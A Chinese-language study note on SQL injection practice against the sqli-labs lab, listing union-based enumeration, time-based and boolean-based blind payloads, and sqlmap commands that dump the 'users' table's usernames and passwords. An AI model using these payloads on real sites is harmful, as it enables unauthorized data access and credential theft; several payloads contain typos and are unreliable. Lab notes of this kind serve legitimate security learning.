笔记
Version()版本
User()用户
Database()数据库
单引号的闭合字符,判断出来闭合字符判断列数order by 采用二分法,然后判断位 union select*,*,*注意是,不是。;
先查版本,再求当前数据库名,求出所有数据库名要用information_schema的库group_concat(table_name) from information_schema.tables where table_schema='security'
(security)是数据库名可更改
表:group_concat(table_name) from information_schema.tables where table_schema='security'
(security)是数据库名可更改
列:group_concat(column_name) from information_schema.columns where table_name='users'
查的是users的表的列,users可更改
用于网页无反馈,无报错信息反馈值;
时间型盲注
1.求数据库名长度
and if(length(database())=8,sleep(5),1) -- -
2.求数据库名对应的ASCII值
and if(ascii(substr((select database()),1,1))=115,sleep(5),1) -- -
3.求表的数量
and if((select count(*) from information_schema.tables where table_schema='security')=4,sleep(5),1)-- -
4.求表名的长度
and if((select length(table_name) from information_schema.tables where table_shcema='secuity' limit 0,1)=6,sleep(5),1) -- -
5.求表名对应的ASCII值
and if(ascii(substr((select(table_name)from information_schema,tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)-- -
6.求列的数量
and if((select count(column_name)from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)-- -
布尔型盲注
1.求闭合字符
2.求数据库名长度
and length(database())=8 %23
3.求当前数据库名对应的ASCII值
and ascii(substr(database(),1,1))=115 %23
4.求表的数量
and (select count(table_name) from information_schema.tables where table_schema='security')=4
%23
5.求表名的长度
and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 %23
6.求表名对应的ASCII值
and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23
7.求列的数量
and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23
8.求列名的长度
and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 %23
9.求列名对应的ASCII值
and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 %23
10.求字段的数量
and (select count(username) from security.users)=13 %23
11.求字段内容的长度
and (select length(username) from security.users limit 0,1)=4 %23
12.求字段对应的ASCII值
and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23
通过工具进行注入
如果是get类型:-u
Post类型:-r
以第一关,get为例:Get:爆当前数据库 –current-db
sqlmap.py -u 127.0.0.1/sqli/Less-1/?id=1 -D security ( -D 指定数据库的名)
sqlmap.py -u 127.0.0.1/sqli/Less-1/?id=1 -D security -T users --colunmns爆出指定的所有列 (-T 后跟表名)
sqlmap.py -u 127.0.0.1/sqli/Less-1/?id=1 -D security -T users -C id,password,username --dump-all 取所有的字段内容 (-C 跟着指定列 字段内容—dump)
浙公网安备 33010602011771号